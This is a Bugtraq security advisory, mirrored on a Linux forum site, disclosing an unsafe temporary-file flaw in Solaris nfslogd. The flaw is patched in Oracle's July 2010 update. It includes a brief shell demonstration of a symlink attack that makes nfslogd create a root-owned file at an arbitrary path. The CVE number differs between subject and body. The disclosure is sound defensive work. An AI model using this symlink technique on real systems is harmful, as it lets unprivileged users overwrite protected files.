|
|
 |
| New User, Welcome! Login |
CVE-2010-2382: Solaris nfslogd unsafe use of temporary files
| From: |
Frank Stuart <fstuart fstuart com> |
| To: |
bugtraq securityfocus com |
| Cc: |
|
| Subject: |
CVE-2010-2382: Solaris nfslogd unsafe use of temporary files |
| Date: |
Mon - Jul 19, 2010 07:55 PM |
Attachments:
fstuart.vcf
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Below is the full disclosure information for CVE-2010-2383. It was
reported to security-alert@sun.com on 29 December, 2009 and assigned Sun
bug 6913655.
This vulnerability was addressed by Sun/Oracle in the July 2010 Critical
Patch Update
(http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html).
- ------
This one is with nfslogd which allows an unprivileged
user to create/overwrite a file as root:
Don't Panic! # ls -dl /etc/oops
/etc/oops: No such file or directory
Don't Panic! # ls -dl /tmp/.nfslogd.pid
lrwxrwxrwx 1 nobody nobody 9 Dec 29 21:24 /tmp/.nfslogd.pid
- -> /etc/oops
Don't Panic! # id
uid=0(root) gid=0(root)
Don't Panic! # /usr/lib/nfs/nfslogd
Don't Panic! # ls -dl /etc/oops
- -rw------- 1 root root 4 Dec 29 21:25 /etc/oops
- ------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iQEVAwUBTEUK12KGA6cQSpZSAQKDmgf+Khyu8Mq5rk4wKHUGQm4NCZOvC75ilW2e
Nr9dw/YEEDIZZkaGHRRtPD9pBgnrdCbP/Pvt6wSYyr+JOLYCO1BGGFA36eenTgzI
lbpDuFDgpVO4+DPb5TslS1MYkLYYFh+S9l0zzdYGVvAbURabp35VW852O2SHY7Pg
ZsUjRUrbSMIPUcVq024CLtro2VCJPiZ9o691ChpNlkdCTdtS6PUCllwQazz/2UFO
Gf21llPnO7kkQP7zbjbTITx9cjx6hYOxKbfLtrupxjtnXHRIjts0ToFxUYnT5eWD
3I/1m8/VjnqQSIY7nytcIj+nZG1z7e/zhOmdE54wRcpQzONYngNcWA==
=ojGd
-----END PGP SIGNATURE-----
|
|
|
Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!
